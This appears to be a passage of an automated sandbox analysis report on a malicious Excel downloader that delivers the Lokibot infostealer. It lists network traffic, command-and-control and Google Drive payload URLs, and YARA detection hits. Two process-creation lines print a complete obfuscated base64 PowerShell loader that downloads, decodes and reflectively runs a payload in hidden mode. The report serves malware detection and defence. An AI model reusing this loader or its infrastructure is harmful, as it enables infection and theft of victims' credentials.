                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 24 Oct 2024 19:24:08 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 24 Oct 2024 19:24:09 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 24 Oct 2024 19:24:13 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 24 Oct 2024 19:24:15 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 24 Oct 2024 19:24:16 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 24 Oct 2024 19:24:17 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 24 Oct 2024 19:24:19 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 24 Oct 2024 19:24:20 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: mshta.exe, 00000004.00000003.417828782.0000000003786000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.418820282.0000000003786000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.3.176.141/
                Source: powershell.exe, 00000006.00000002.452706193.0000000003806000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.3.176.141/35/educatio
                Source: powershell.exe, 00000006.00000002.452706193.0000000003806000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.3.176.141/35/educationalthingswithgreatattitudeonhere.tIF
                Source: powershell.exe, 00000006.00000002.456851525.000000001A9FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.3.176.141/35/educationalthingswithgreatattitudeonhere.tIF34e089r
                Source: powershell.exe, 00000006.00000002.452706193.0000000003806000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.3.176.141/35/educationalthingswithgreatattitudeonhere.tIFp
                Source: mshta.exe, 00000004.00000003.418148020.00000000037F0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.417828782.0000000003786000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.417810676.00000000037F0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.418291417.000000000297E000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.418820282.0000000003786000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.417828782.00000000037D4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.418820282.00000000037D4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.418985006.00000000037F0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.418169581.00000000002FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.3.176.141/35/ou/nicegirlwithnewthingswhichevennobodknowthatkissingme.hta
                Source: mshta.exe, 00000004.00000003.417828782.00000000037D4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.418820282.00000000037D4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.3.176.141/35/ou/nicegirlwithnewthingswhichevennobodknowthatkissingme.hta...
                Source: mshta.exe, 00000004.00000003.417828782.0000000003786000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.418820282.0000000003786000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.3.176.141/35/ou/nicegirlwithnewthingswhichevennobodknowthatkissingme.htaA
                Source: mshta.exe, 00000004.00000003.418148020.00000000037F0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.417810676.00000000037F0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.418985006.00000000037F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.3.176.141/35/ou/nicegirlwithnewthingswhichevennobodknowthatkissingme.htaG
                Source: mshta.exe, 00000004.00000003.418148020.00000000037F0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.417810676.00000000037F0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.418985006.00000000037F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.3.176.141/35/ou/nicegirlwithnewthingswhichevennobodknowthatkissingme.htaS
                Source: mshta.exe, 00000004.00000003.418148020.00000000037F0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.417810676.00000000037F0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.418985006.00000000037F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.3.176.141/35/ou/nicegirlwithnewthingswhichevennobodknowthatkissingme.hta_
                Source: mshta.exe, 00000004.00000003.417828782.0000000003786000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.418820282.0000000003786000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.3.176.141/35/ou/nicegirlwithnewthingswhichevennobodknowthatkissingme.htaf
                Source: mshta.exe, 00000004.00000002.418493230.0000000000355000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.418169581.0000000000355000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.3.176.141/35/ou/nicegirlwithnewthingswhichevennobodknowthatkissingme.htag
                Source: mshta.exe, 00000004.00000003.418291417.0000000002975000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.3.176.141/35/ou/nicegirlwithnewthingswhichevennobodknowthatkissingme.htahttp://192.3.176.
                Source: mshta.exe, 00000004.00000003.418148020.00000000037F0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.417810676.00000000037F0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.418985006.00000000037F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.3.176.141/35/ou/nicegirlwithnewthingswhichevennobodknowthatkissingme.htak
                Source: mshta.exe, 00000004.00000002.418493230.0000000000355000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.418169581.0000000000355000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.3.176.141/35/ou/nicegirlwithnewthingswhichevennobodknowthatkissingme.htal
                Source: mshta.exe, 00000004.00000003.418148020.00000000037F0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.417810676.00000000037F0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.418985006.00000000037F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.3.176.141/35/ou/nicegirlwithnewthingswhichevennobodknowthatkissingme.htaw
                Source: mshta.exe, 00000004.00000003.417828782.0000000003786000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.418820282.0000000003786000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.3.176.141/Z
                Source: mshta.exe, 00000004.00000003.417828782.0000000003786000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.418820282.0000000003786000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
                Source: mshta.exe, 00000004.00000003.417828782.0000000003786000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.418820282.0000000003786000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
                Source: mshta.exe, 00000004.00000003.417828782.0000000003786000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.418820282.0000000003786000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/2048ca.crl0
                Source: mshta.exe, 00000004.00000003.417828782.0000000003786000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.418820282.0000000003786000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/server1.crl0
                Source: mshta.exe, 00000004.00000003.417828782.0000000003786000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.418820282.0000000003786000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                Source: mshta.exe, 00000004.00000003.417828782.0000000003786000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.418820282.0000000003786000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
                Source: mshta.exe, 00000004.00000003.417828782.0000000003786000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.418820282.0000000003786000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
                Source: powershell.exe, 00000006.00000002.452706193.0000000002E91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://go.micros
                Source: powershell.exe, 00000006.00000002.452706193.000000000223C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.456451970.0000000012061000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                Source: mshta.exe, 00000004.00000003.417828782.0000000003786000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.418820282.0000000003786000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0
                Source: mshta.exe, 00000004.00000003.417828782.0000000003786000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.418820282.0000000003786000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0%
                Source: mshta.exe, 00000004.00000003.417828782.0000000003786000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.418820282.0000000003786000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0-
                Source: mshta.exe, 00000004.00000003.417828782.0000000003786000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.418820282.0000000003786000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0/
                Source: mshta.exe, 00000004.00000003.417828782.0000000003786000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.418820282.0000000003786000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com05
                Source: mshta.exe, 00000004.00000003.417828782.0000000003786000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.418820282.0000000003786000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net03
                Source: mshta.exe, 00000004.00000003.417828782.0000000003786000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.418820282.0000000003786000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net0D
                Source: powershell.exe, 00000006.00000002.452706193.0000000002031000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.604737245.000000000237E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.502500723.0000000002451000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                Source: mshta.exe, 00000004.00000003.417828782.0000000003786000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.418820282.0000000003786000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com.my/cps.htm02
                Source: mshta.exe, 00000004.00000003.417828782.0000000003786000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.418820282.0000000003786000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
                Source: AddInProcess32.exe, AddInProcess32.exe, 00000010.00000002.620879687.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://www.ibsensoftware.com/
                Source: powershell.exe, 00000006.00000002.456451970.0000000012061000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                Source: powershell.exe, 00000006.00000002.456451970.0000000012061000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                Source: powershell.exe, 00000006.00000002.456451970.0000000012061000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                Source: powershell.exe, 0000000F.00000002.502500723.0000000002652000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com
                Source: powershell.exe, 0000000F.00000002.502500723.0000000002652000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur
                Source: powershell.exe, 0000000F.00000002.502500723.000000000281A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com
                Source: powershell.exe, 0000000F.00000002.502500723.000000000281A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur&export=download
                Source: mshta.exe, 00000004.00000003.417828782.0000000003786000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.418820282.0000000003786000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mpa.li/
                Source: mshta.exe, 00000004.00000002.418493230.0000000000355000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.418169581.0000000000355000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mpa.li/6432H
                Source: mshta.exe, 00000004.00000002.418493230.0000000000355000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.418169581.0000000000355000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mpa.li/C:T
                Source: mshta.exe, 00000004.00000002.418466180.00000000002DA000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.W97M.DownLoader.6515.29545.30613.xlsx, 09230000.0.drString found in binary or memory: https://mpa.li/ZDFWtO
                Source: powershell.exe, 00000006.00000002.452706193.000000000223C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.456451970.0000000012061000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                Source: mshta.exe, 00000004.00000003.417828782.0000000003786000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.418820282.0000000003786000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.comodo.com/CPS0
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49169
                Source: unknownNetwork traffic detected: HTTP traffic on port 49163 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49168
                Source: unknownNetwork traffic detected: HTTP traffic on port 49165 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49165
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49163
                Source: unknownNetwork traffic detected: HTTP traffic on port 49168 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49169 -> 443
                Source: unknownHTTPS traffic detected: 5.159.62.244:443 -> 192.168.2.22:49163 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 5.159.62.243:443 -> 192.168.2.22:49165 version: TLS 1.2
                Source: C:\Windows\System32\mshta.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior

                System Summary

                barindex
                Source: 16.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                Source: 16.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                Source: 16.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                Source: 16.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 16.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                Source: 16.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                Source: 16.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                Source: 16.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                Source: 16.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 16.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                Source: 00000010.00000002.620879687.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                Source: 00000010.00000002.620879687.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                Source: 00000010.00000002.620879687.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Loki Payload Author: kevoreilly
                Source: 00000010.00000002.620879687.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 00000010.00000002.620879687.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                Source: Process Memory Space: powershell.exe PID: 3036, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                Source: Process Memory Space: powershell.exe PID: 1224, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                Source: Process Memory Space: AddInProcess32.exe PID: 1488, type: MEMORYSTRMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                Source: SecuriteInfo.com.W97M.DownLoader.6515.29545.30613.xlsxOLE: Microsoft Excel 2007+
                Source: 09230000.0.drOLE: Microsoft Excel 2007+
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\nicegirlwithnewthingswhichevennobodknowthatkissingme[1].htaJump to behavior
                Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}\ProgIDJump to behavior
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiAoICRFTnY6Q29tU3BlQ1s0LDE1LDI1XS1Kb0luJycpKCAoJzBRYWltYWdlVXJsID0gZjdWaHQnKyd0cHM6Ly8nKydkcml2ZS5nb29nbGUuY29tL3VjP2V4cG9ydD1kb3dubG9hZCZpZD0xQUlWZ0pKSnYxRjZ2UzRzVU95Ym5ILXNEdlVoQll3dScrJ3IgZjdWOzBRYXdlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7MFFhaW1hZ2VCeXRlcyA9IDBRYXdlYkNsaWVudC5Eb3dubG9hZERhdGEoMFFhaW1hZ2VVcmwnKycpOycrJzBRYWltYWdlVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKDBRYWltYWdlQnl0ZXMpOzBRYXN0YXJ0RmxhZyA9IGY3Vjw8QkFTRTY0X1NUQVJUPj5mN1Y7MFFhZW5kRmxhZyA9IGY3Vjw8QkFTRTY0X0VORD4+ZjdWOycrJzBRYXN0YXJ0SW5kZXggPSAwUWFpbWFnJysnZVRleHQuSW5kZXhPZigwUWFzdGFyJysndEZsYWcpOzBRYWVuZEluZGV4ID0nKycgMFFhaW1hZ2VUZXh0LkluZGV4T2YoMFFhZW5kRmxhZyk7MFFhc3RhcnRJbmRleCAtZ2UgMCAtJysnYW5kIDBRYWVuZEluZGV4IC1ndCAwUWFzdGFydEluZGV4OzBRYXN0YXJ0SW5kZXggKz0gMFFhc3RhcnRGbGFnLkxlbmd0aDswUWFiJysnYXNlNjRMZW5ndGggJysnPSAwUWFlbmRJbmRleCAtIDBRYXN0YXJ0SW5kZXg7MCcrJ1FhYmFzZTY0Q29tbWFuZCA9IDBRYWltYWdlVGV4dC5TdWJzdHJpbmcoMFFhc3RhcnRJbmRleCwgMFFhYmFzZScrJzY0TGVuZ3RoKTswUWFiYXNlNjRSZXZlcnNlJysnZCA9IC1qb2luICgwUWFiYXNlNjRDb21tYW5kLlRvQ2hhckFycmF5KCkgWWJJIEZvckVhY2gtT2JqZWN0IHsgMFFhXyB9KVstMS4uLSgwUWFiYXNlNjRDb21tYScrJ25kLkxlbmd0aCldOzBRYWNvbW1hbmRCeXRlcyA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoMFFhYmFzZTY0UmV2ZXJzZWQpOzBRYWxvYWRlZEFzJysnc2VtYmx5ID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6JysnTG9hZCgwUWFjb21tYW5kQnl0ZXMpOzBRYXZhaU1ldGhvZCA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoZjdWVkFJZjdWKTswUWF2YWlNZXRob2QuSW52b2tlKDBRYW51bGwsIEAoZjdWdHh0LlJSRVBMTVMvNTMvMTQxLjY3MS4zLjI5MS8vOnB0dGhmN1YsIGY3VmRlc2F0aXZhZG9mN1YsIGY3VmRlc2F0aXZhZG9mN1YsIGY3VmRlc2F0aXZhZG9mN1YsIGYnKyc3VkFkZEluUHJvY2VzczMyZjdWLCBmN1ZkZXNhdCcrJ2l2YWRvZjdWLCBmN1ZkZXMnKydhdGl2YWRvZjdWLGY3VmRlc2F0aXZhZG9mN1YsJysnZjdWZGVzYXRpdmFkb2Y3VixmN1ZkZXNhdGknKyd2YWRvZjdWJysnLGY3VmRlc2F0JysnaXZhZG9mN1YsZjdWZGVzYXRpdmFkb2Y3VixmN1YxZjdWLGY3VmRlc2F0aXZhZG9mN1YpKTsnKS5SZXBsQUNFKChbY2hBcl04OStbY2hBcl05OCtbY2hBcl03MyksJ3wnKS5SZXBsQUNFKCdmN1YnLFtTdHJJTkddW2NoQXJdMzkpLlJlcGxBQ0UoKFtjaEFyXTQ4K1tjaEFyXTgxK1tjaEFyXTk3KSwnJCcpICk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiAoICRFTnY6Q29tU3BlQ1s0LDE1LDI1XS1Kb0luJycpKCAoJzBRYWltYWdlVXJsID0gZjdWaHQnKyd0cHM6Ly8nKydkcml2ZS5nb29nbGUuY29tL3VjP2V4cG9ydD1kb3dubG9hZCZpZD0xQUlWZ0pKSnYxRjZ2UzRzVU95Ym5ILXNEdlVoQll3dScrJ3IgZjdWOzBRYXdlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7MFFhaW1hZ2VCeXRlcyA9IDBRYXdlYkNsaWVudC5Eb3dubG9hZERhdGEoMFFhaW1hZ2VVcmwnKycpOycrJzBRYWltYWdlVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKDBRYWltYWdlQnl0ZXMpOzBRYXN0YXJ0RmxhZyA9IGY3Vjw8QkFTRTY0X1NUQVJUPj5mN1Y7MFFhZW5kRmxhZyA9IGY3Vjw8QkFTRTY0X0VORD4+ZjdWOycrJzBRYXN0YXJ0SW5kZXggPSAwUWFpbWFnJysnZVRleHQuSW5kZXhPZigwUWFzdGFyJysndEZsYWcpOzBRYWVuZEluZGV4ID0nKycgMFFhaW1hZ2VUZXh0LkluZGV4T2YoMFFhZW5kRmxhZyk7MFFhc3RhcnRJbmRleCAtZ2UgMCAtJysnYW5kIDBRYWVuZEluZGV4IC1ndCAwUWFzdGFydEluZGV4OzBRYXN0YXJ0SW5kZXggKz0gMFFhc3RhcnRGbGFnLkxlbmd0aDswUWFiJysnYXNlNjRMZW5ndGggJysnPSAwUWFlbmRJbmRleCAtIDBRYXN0YXJ0SW5kZXg7MCcrJ1FhYmFzZTY0Q29tbWFuZCA9IDBRYWltYWdlVGV4dC5TdWJzdHJpbmcoMFFhc3RhcnRJbmRleCwgMFFhYmFzZScrJzY0TGVuZ3RoKTswUWFiYXNlNjRSZXZlcnNlJysnZCA9IC1qb2luICgwUWFiYXNlNjRDb21tYW5kLlRvQ2hhckFycmF5KCkgWWJJIEZvckVhY2gtT2JqZWN0IHsgMFFhXyB9KVstMS4uLSgwUWFiYXNlNjRDb21tYScrJ25kLkxlbmd0aCldOzBRYWNvbW1hbmRCeXRlcyA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoMFFhYmFzZTY0UmV2ZXJzZWQpOzBRYWxvYWRlZEFzJysnc2VtYmx5ID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6JysnTG9hZCgwUWFjb21tYW5kQnl0ZXMpOzBRYXZhaU1ldGhvZCA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoZjdWVkFJZjdWKTswUWF2YWlNZXRob2QuSW52b2tlKDBRYW51bGwsIEAoZjdWdHh0LlJSRVBMTVMvNTMvMTQxLjY3MS4zLjI5MS8vOnB0dGhmN1YsIGY3VmRlc2F0aXZhZG9mN1YsIGY3VmRlc2F0aXZhZG9mN1YsIGY3VmRlc2F0aXZhZG9mN1YsIGYnKyc3VkFkZEluUHJvY2VzczMyZjdWLCBmN1ZkZXNhdCcrJ2l2YWRvZjdWLCBmN1ZkZXMnKydhdGl2YWRvZjdWLGY3VmRlc2F0aXZhZG9mN1YsJysnZjdWZGVzYXRpdmFkb2Y3VixmN1ZkZXNhdGknKyd2YWRvZjdWJysnLGY3VmRlc2F0JysnaXZhZG9mN1YsZjdWZGVzYXRpdmFkb2Y3VixmN1YxZjdWLGY3VmRlc2F0aXZhZG9mN1YpKTsnKS5SZXBsQUNFKChbY2hBcl04OStbY2hBcl05OCtbY2hBcl03MyksJ3wnKS5SZXBsQUNFKCdmN1YnLFtTdHJJTkddW2NoQXJdMzkpLlJlcGxBQ0UoKFtjaEFyXTQ4K1tjaEFyXTgxK1tjaEFyXTk3KSwnJCcpICk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxDJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
